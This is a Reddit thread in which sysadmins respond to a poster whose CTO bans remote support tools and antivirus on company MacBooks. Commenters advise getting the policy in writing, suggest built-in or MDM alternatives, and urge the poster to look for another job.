Dumb policy but I’m assuming you’re in a Windows environment. Why can’t you use the built in quick assist?
ProfessionalEven296@reddit
He says that they all have MacBooks.
IdleWanderlust@reddit
Ah I missed that part. The Mac has built in screen sharing too and it can also be done through FaceTime, or other allowed software. Still a stupid policy but one that can be worked around with approved tools.
ProfessionalEven296@reddit
Totally agree on the "Stupid Policy" bit. Some people should not be in management.
crankysysadmin@reddit
You need a new job like yesterday.
We support a lot of Macs and we like Macs at my company but we definitely need threat protection software on the Mac and the Windows machines. It finds stuff ALL. THE. TIME. on both macOS and Windows.
independent_observe@reddit
Get out now. They have absolutely zero respect for you and your experience
socra@reddit
Send this thread to the global CEO. Problem solved :)
Wizdad-1000@reddit
Get this in writing 1000% Wowzers! This is going to backfire HARD. GL
Vectan@reddit
Short: Run. No remote tools is one thing, no antivirus because Mac is just flat out stupid. A cyber event or incident is just a matter of time with this kind of mindset.
Long: Document everything and keep copies. Once you CYA. Let the users feel the pain, keep being professional, do your best, but eventually the pain should (hopefully) bubble up to him. Polish the resume and look for a new job, cause that kind of person will absolutely blame you or anyone else they can when stuff hits the fan.
If you have your CYA, maybe something legal will happen in your favor. Even if not you can clearly show how you handled things professionally and did the best you could with what you were provided and allowed.
Sorry you have to deal with that. All the things you did were spot on (proactive, advocate to best support your customers, etc.). Best of luck.
Leather_Secretary_13@reddit
Honestly, look for other work dude.
New company ownership, new rules, new meetings, and you are not part of them.
It's only a matter of time until they get to handling what to do with your roles.
MyWifesBoyfriend_@reddit
You don't need remote access tools to support end users.
CoffeeOrDestroy@reddit
Found the CTO
MyWifesBoyfriend_@reddit
My company has remote access tools restricted too, even the functionality in Zoom. Remote access is a huge security risk, even if it is less inefficient than just doing it yourself for the end user.
100% remote, globally distributed company too.
CoffeeOrDestroy@reddit
Who handles admin rights?
MyWifesBoyfriend_@reddit
Tools like Admin by Request for JIT admin access. Use is audited
UninvestedCuriosity@reddit
Absolute cinema. Please write more like this.
ccsrpsw@reddit
He’s moving everyone to Mac’s? You won’t have any E3 or other support tools then. I know there are Mac solutions but if you come from a Windows world… good luck without some level of MDM. And AV.
thunderbird32@reddit
At least Defender for Endpoint supports Mac, so that's *something*.
dinominant@reddit
How do you do anything that requires local admin access without compromising the system by revealing the local admin password?
Do you have access to ship laptops around and a few soare units?
Maintain compliance by having a spare laptop at each location and cross-ship to fix?
Main_Ambassador_4985@reddit
Does the MDM have remote access built-in or least remote scripting shell?
If there is no MDM the MacBooks are basic company purchased BYOD.
Macs need XDR and Vulnerability scanning.
In our system the Macs are always triggering events because our MDM is slow to sync and the users think they are invincible.
WesDoesStuff@reddit
Windows 11 had quick assist / Microsoft remote assist. You can set up default configs and authorized user groups in group policy. Sucks if you need to run anything elevated but better than nothing. You can also have them screen share and request control with teams.
MojArch@reddit
I have 1 recommendation. Document any and everything he says with this own hands and knowladge.
We have kind similar situation and all I did was ask them to write it as official letter and order.
Now when anyone complains about slow flow of fixing system I just point to those orders and they get immediately quite.
flsingleguy@reddit
That’s wild. I am an IT Director and properly secured remote access is such a game changer for so many different roles.
InflateMyProstate@reddit
That’s incredibly frustrating. A lot of users I’ve worked with in the past won’t put up with a 2 hour video call where you’re trying to troubleshoot and give them commands or keys to press where the alternative is you just remoting in and driving the session to fix the issue while they can walk away or do something else. Plus, it eats into your day where you could be performing other tasks and turns a routine function into a multiple hour fiasco. Not to mention, the frustration of yourself and the end user. I’ve had to do this a few times where remote control was not available and both the user and I wanted to pull our hair out. That’s absurd, if the CTO is unwilling to budge and you’ve done everything you can, I would sadly say it’s time to start applying to other jobs. I would lose my mind. Good luck
Opposite_Bag_7434@reddit
OP if you are using Entra ID why not use Quick Assist?
By the way it is possible to do much of what you need using whatever conferencing platform, like Teams, Zoom, etc the company is using. You may need to have the user point the mouse and press keys on the keyboard, but it is very possible to support users this way. Servers not so much.
This is still a hard situation for sure.
rodder678@reddit
Troubleshoot? Remote access? SSPR is enabled. Anything else, click Fresh Start in Intune. If they won't go away, send them AI slop to try until their machine isn't recoverable. The key is to stop caring whether anything works.
/s
Horror-Squirrel4142@reddit
The no-antivirus-because-MacBooks line is a massive red flag. macOS malware has been growing 30%+ year over year, and every compliance framework (CIS, SOC2, ISO 27001) requires endpoint protection regardless of OS. That alone tells you his decisions are not risk-based, they are ego-based.
Document every incident where the lack of remote access caused delays. Track the hours wasted on video call troubleshooting vs what a 30-second remote session would have taken. When something breaks badly enough that leadership notices, you will have the paper trail to show this was a predicted and preventable failure.e has been growing 30%+ year over year, and every compliance framework (CIS, SOC2, ISO 27001) requires endpoint protection regardless of OS. That alone tells you his decisions aren't risk-based.
Document every incident where the lack of remote access caused delays. Track the hours wasted on video call troubleshooting vs what a 30-second remote session would have taken. When something breaks badly enough that leadership notices, you'll have the paper trail.
6Saint6Cyber6@reddit
No help on the remote access tool other than to track how long these issues take to resolve so you have a comparison.
Get the no EDR in writing and make sure legal knows the stance. Outside of the extremely high likelihood that no cyber insurance company will cover the company without it, I can’t imagine the lawsuits after a breach with no EDR on endpoints.
zmttoxics2@reddit
Depending on the video call tool you can usually request control and drive the session. Not perfect I know but better than 100% verbal.
the_syco@reddit
Does this include Teams? Used it in previous companies to remote control over basic non-admin functions.
ByronScottJones@reddit
My advice is document everything, and do exactly what he says. And don't just keep screenshots where he can delete them. Hard copies with signed dates on them. When this blows up, he will point the finger at you. Be ready with the receipts.
zer04ll@reddit
If you are a windows company use quick connect its built in to windows and allows remote control, you are not installing anything it’s made by Microsoft and built in. If not using only windows good luck.
ProgressBartender@reddit
Op made it sound like they use MacBooks
zer04ll@reddit
Apple just made their in house MDM way better for deployment its takes a bit to set up with Apple way more than others but they do have a built in solution as well
HailYurii@reddit
What is your title?
Imhereforthechips@reddit
I have had only 1 jackass that was really rigid. I didn’t butt heads with him, but did have very open conversations about his perspective and why he was adamant about xyz. I found it much more helpful to listen and fully understand his logic. After that, it was easy to get things done because I knew what his modus operandi was.
BIG_SCIENCE@reddit
His response: "We don't need antivirus because we use MacBooks."
lol you are in danger. you need to find another job.
mysticalfruit@reddit
Get that shit in writing..
======== CUT HERE ========
Dear CTO,
I am writing to clarify for my records that our companies official policy is to forbid the use of all remote access tools and all support is to be done over video link.
Thanks,
uw4yn3
======== CUT HERE ========
Honestly, that's a bullshit policy.. I really hope you're getting paid by the hour!
braliao@reddit
Start working on your resume.. It's time to leave.
N3rdScool@reddit
imagine needing to ask the person to install anydesk lol i guess thats blocked tho lol what a cluster fuck
musiquededemain@reddit
Your CTO should not be in that position.
Isi0815-2@reddit
Maybe you report one level higher then this person, to somebody who bought your company.
Just to check if it is for killing your firm.
Get a new job?
Emotional_Garage_950@reddit
dude sounds like either an idiot or it actually is definitely budget related.
use Teams screen share if that’s allowed, and provide the LAPS password to the user if elevation is required. Configure LAPS to rotate the password after it gets used
javierdapear@reddit
jamf is the solution, you can also deploy laps with intune
FuckinHighGuy@reddit
As I said above, jamf for Mac’s is pretty much the standard.
Good call.
Emotional_Garage_950@reddit
you can, if you want to wipe and re-enroll the Mac (this is the case with Intune, idk about Jamf. also don’t know if OP already has laps set up 🤷♂️)
anonfreakazoid@reddit
Don't call it anti virus. It's next-generation Endpoint Detection and Response.
It's not remote access. It's MDM for securing and configuring mobile devices and RMM for deep, proactive monitoring and maintenance.
If you don't know why he is banning it, think of responses if/when he does tell you.
poizone68@reddit
I assume CTO in this context is Chief Troglodyte Officer?
PlayingDoomOnAGPS@reddit
Who hasn't? This is endemic to IT.
RikiWardOG@reddit
I mean 90% of the time zoom is enough for us. Ask for remote control and then just drive from there
largos7289@reddit
LOL the CTO is a flaming idiot. Like i'm not exaggerating here, he's a complete moron. I mean way way back in the day, his case may have held water about the mac books, since they maybe had 10% of the marketplace and where weird one off cases in businesses. I think i may have ran into one back in the 80's-90's besides the apple 2e i used in HS/college. Anyway... I would sure as shit would want a written confirmation that this is his policy. Only way this is going to get resolved is CEO level intervention. He's not going to listen to the likes of you... evidently.
Scrug@reddit
Some companies do not use remote access tools. They are a massive security hole. The company I work for does not, but we do not hire 100% remote. The expectation is that if I can't fix your issue remotely then you'll have to come into the office.
I don't know how it's possible to support 100% remote employees without some kind of access tool. Do these users have admin access on their devices?
TheEminentFascism@reddit
The CTO thinks MacBooks don't need antivirus and remote access is unnecessary, so honestly just document every ticket, every hour spent on video calls, and every issue that could've been resolved in minutes, then when the security breach or compliance audit hits you can pull up the email trail showing you asked multiple times and were told no.
Swimming-Hawk-8639@reddit
Use quick assist. Better than nothing. It generally comes pre installed on every windows device. Maybe this doofus CTO isn’t aware of it.
evolutionxtinct@reddit
I wish you the best OP, that CTO has no idea what they are doing….
800oz_gorilla@reddit
I have banned cloud based remote access software. Point to point only, use a jump box if you're not able to use an sd wan tunnel. Then use our program in direct mode.
That said, it's painful, and if he's serious about security, point out the that OS's are locking down the desktop to prevent you from seeing security screens. (Secure desktop) That's why on a teams screen share you can't see a UAC prompt
I'm also pushing hard for system context app pushing with no local admin access for the user. Hopefully the Microsoft intune suite coming in July will help, you will get access to Endpoint Privilege Management
But if you're only on Macs, Lord help you. I have no advice to offer because no AV, not even defender, with as many vulnerabilities that are being exploited due to AI efforts, that CIO is a dumbass.
miscdebris1123@reddit
No antivirus/edr? What does your cyber insurance say?
badaz06@reddit
How about using teams?
discosoc@reddit
Just stop stressing. Let the tickets pile up while you comfortably work through each “over the phone” with a complete lack of urgency.
ihaxr@reddit
You need to stop making waves over hypothetical situations. If they're getting new laptops they're probably going to be a standard image and on the new companies infrastructure and you won't be expected to support most of the stuff anyway.
Like what? Roll out a handful of new laptops to users and document the problems and why/how you taking control of their workstation is necessary. If it's a big enough issue, the users will complain up their chain to the IT folks responsible. If they still refuse to fix it, it's not really your problem...
F0LL0WFREEMAN@reddit
How did he become a CTO? He might be an idiot.
shaggy24200@reddit
Start sending expense reports for on-site visits!
CoffeeOrDestroy@reddit
Does everyone have admin rights in their system too or are you supposed to provide admin credentials verbally? What is your company’s policy on disclosing passwords? Please put all of this in writing no matter what. We all know where the CTO will point his fingers when it hits the fan.
gunzstri@reddit
This is just crazy. No remote tools? How are you suppose to solve the issue quickly? Time to update your resume and leave.
TheShmoe13@reddit
Until he said (basically) “Mac’s don’t need A/V” my working theory was that they do have RMM, but just don’t want to share access to it with you. Which likely means that you are going to be let go at the first possible moment.
Assuming this CTO is the global tech leader for this company and not a regional CTO, you don’t want to be here anyways. Let the complaints pile up, and work on your résumé.
If he’s not the global org’s CTO and just a regional guy, you can play politics, have users complain directly to global management about the change in support regime and how much worse it is after this CTO came into the picture. But I wouldn’t hold my breath.
Watsonwes@reddit
I would quit that’s insanity
jks513@reddit
The leadership is honestly trying to get him to quit from that description.
CrimsonFlash911@reddit
Man, this sounds like the time I proposed an automated patching solution to a previous boss and he said “if you can’t do it with a spreadsheet no program would help” to which I replied “we’re talking about patch management not keeping track of line items” and he said “I’m the boss and you’re going to do what I say”.
So I did - and I left - and I never looked back. Some people are impossible to manage both up and down.
RantyITguy@reddit
Not having remote access or having to troubleshoot macs in a business environment would be stressful.
Having to deal with both? ... I'd lose my damn fucking mind. Just collect your paycheck and let his stupidity fall in on itself.
No shame in working slower because you have probably the most legitimate reason in the universe as to why support will be slow.
Take my advice, don't try to be a team player and stress about things not getting done. It will kill you inside. Trust me.
jhuseby@reddit
I’d start doing the bare minimum to keep your job while looking for a better work environment.
thebbtrev@reddit
I think this could be cross-posted to r/maliciouscompliance
Jesus
strongest_nerd@reddit
How'd he become CTO? Owners brother?
DontTakePeopleSrsly@reddit
Sounds like he wants you to quit, so find another job and give him what he wants.